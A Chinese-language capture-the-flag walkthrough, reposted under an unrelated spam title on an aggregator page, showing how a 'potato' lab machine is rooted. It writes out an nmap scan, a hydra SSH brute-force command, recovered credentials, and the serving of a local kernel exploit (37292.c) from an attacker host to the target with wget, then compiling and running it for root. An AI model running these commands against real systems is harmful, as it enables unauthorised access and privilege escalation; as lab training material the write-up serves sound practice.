当前位置: 首页> 娱乐> 影视 > 成都网站制作成都_怎样做免费网站建设_游戏推广赚佣金的平台_百度广告公司联系方式

成都网站制作成都_怎样做免费网站建设_游戏推广赚佣金的平台_百度广告公司联系方式

时间:2025/7/19 5:54:28来源:https://blog.csdn.net/qq_54694921/article/details/144968976 浏览次数:0次
成都网站制作成都_怎样做免费网站建设_游戏推广赚佣金的平台_百度广告公司联系方式

nat模式打开靶机

扫Ip

访问 IP 得到一张土豆页面

扫端口

nmap -A -p- 192.168.146.158

发现80 和7120端口 使用的是ubuntu服务器

访问7120端口

扫目录

爆破ssh 7120端口

hydra ssh://192.168.146.158:7120 -l potato -P /usr/share/wordlists/john.lst -vV -f -t 32

得到登录账户和密码 potato letmein

远程登陆

ssh potato@192.168.146.158 -p7120

通过之前的端口信息知道他使用的是ubuntu服务器

查看Ubuntu版本

cat /etc/*release

再打开一个终端 搜索ubuntu14.04版本的漏洞

searchploit ubuntu 14.04

找到exp 将其复制在d当前目录下方便后面使用 b

cp /usr/share/exploitdb/exploits/linux/local/37292.c .

把37197.c放到目标机,开启一个web服务,使用python 搭建简易的http服务器,在哪个目录运行网站根目录就放在哪,所以不用切换目录

python3 -m http.server 80

靶机到web服务器上下载37292.c

wget http://192.168.146.128/37292.c

执行这个exp文件 就获得root权限了

gcc 37292.c -o exp
ls
./exp

flag

cd /root
ls
cat proof.txt

关键字:成都网站制作成都_怎样做免费网站建设_游戏推广赚佣金的平台_百度广告公司联系方式

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com

责任编辑: